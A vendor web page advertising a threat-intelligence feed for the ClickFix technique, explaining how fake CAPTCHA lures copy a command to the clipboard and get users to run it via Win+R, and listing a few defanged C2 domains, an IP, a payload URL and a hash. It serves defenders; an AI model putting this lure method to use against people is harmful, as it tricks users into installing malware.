Threat intelligence feed

ClickFix IOC Feed

ClickFix is a fast-growing social-engineering technique that tricks users into running malicious commands themselves. PrecisionSec's ClickFix feed tracks active lure domains, distribution URLs and C2 infrastructure in real time.

Get live ClickFix IOCs

What is ClickFix?

ClickFix is a social-engineering technique that emerged in 2024 and has quickly become one of the most common methods of initial access. Rather than relying on a malicious attachment or a software exploit, ClickFix convinces the victim to compromise their own machine.

A user lands on a compromised website, a malicious ad or a phishing page and is shown a fake prompt, most often a bogus "Verify you are human" CAPTCHA or a "fix this error to continue" message. The page silently copies a command to the clipboard and instructs the user to open the Windows Run dialog (Win+R), paste (Ctrl+V) and press Enter. That single action executes a PowerShell, mshta or curl command that downloads and runs malware.

Anatomy of a ClickFix lure: a fake CAPTCHA prompt instructing the user to paste and run a command

Why ClickFix slips past traditional defenses

Because the victim runs the command themselves, ClickFix sidesteps many traditional defenses: there is no malicious attachment for email security to detonate, no macro to block and no file download for the browser to flag.

ClickFix attack chain: from lure page to clipboard command to second-stage payload

Why track it with PrecisionSec

Catch campaigns as they go live

We actively track ongoing ClickFix campaigns, including lure pages, distribution infrastructure and the second-stage payloads they deliver (infostealers such as Lumma and remote access trojans such as AsyncRAT), continuously monitored, verified and added to the feed.

High-confidence, curated indicators

Every indicator is internally verified using custom YARA rules, so you action curated intelligence instead of chasing false positives.

Built for your stack

ClickFix lure domains, distribution URLs and C2 IOCs are delivered in the formats your existing security tools already speak.

Data feeds are delivered via STIX/TAXII, MISP, CSV and REST API. See all integrations. ClickFix lure, distribution and C2 IOCs are included in every PrecisionSec intelligence subscription.

Recent ClickFix IOCs

Live ClickFix command & control (C2) indicators, pulled straight from our threat feed and refreshed as fast as every minute. For full coverage and API delivery, sign up for a free trial.

Live feed

ClickFixtag=clickfix

Updated 41s ago

First seen	Indicator	Type	Confidence
3m	secure-update-cdn[.]net	C2 domain	High
9m	91.213.50[.]114	C2 IP	High
15m	api-telemetry-sync[.]com/load	Payload URL	High
22m	b7e2f48c…3d90af	SHA256 Hash	Medium
38m	node-relay-7f1c[.]org	C2 domain	High

Live ClickFix indicators, surfaced and verified the moment they appear. Shown defanged for safe browsing. Get raw, real-time data via the REST API or a free trial.

Ready to see all of our data?

Start your 15-day free trial and get the full ClickFix feed, plus every other malware and C2 feed.

Start a free trial